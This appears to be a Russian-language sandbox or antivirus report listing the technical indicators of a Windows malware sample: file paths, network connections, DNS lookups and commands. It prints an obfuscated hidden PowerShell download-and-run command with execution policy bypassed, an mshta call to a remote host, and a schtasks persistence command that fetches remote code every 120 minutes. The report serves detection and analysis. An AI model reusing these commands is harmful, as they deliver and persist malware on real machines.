Техническая информация
- <SYSTEM32>\tasks\cdtcomecu
- '<SYSTEM32>\mshta.exe' HTTp://tn#.sh/MicrosoftCDT
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ExecutionPolicy Bypass $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/new/1.txt...
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %TEMP%\datc51.tmp
- %WINDIR%.lnk
- %APPDATA%\microsoft\windows\templates\windows.lnk
- %TEMP%\datc51.tmp
- 'tn#.sh':80
- 'tn#.sh':443
- 'dr########3.hospedagemdesites.ws':80
- 'la####a.hopto.org':5155
- http://dr########3.hospedagemdesites.ws/dreamnovo/wp-includes/certificates/new/0.mp3
- DNS ASK tn#.sh
- DNS ASK dr########3.hospedagemdesites.ws
- DNS ASK st####.rapidssl.com
- DNS ASK la####a.hopto.org
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 120 /tn "CDTcomeCU" /tr "\"<SYSTEM32>\mshta.exe\"http://ho###nuve.com/erro.crt" /F
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'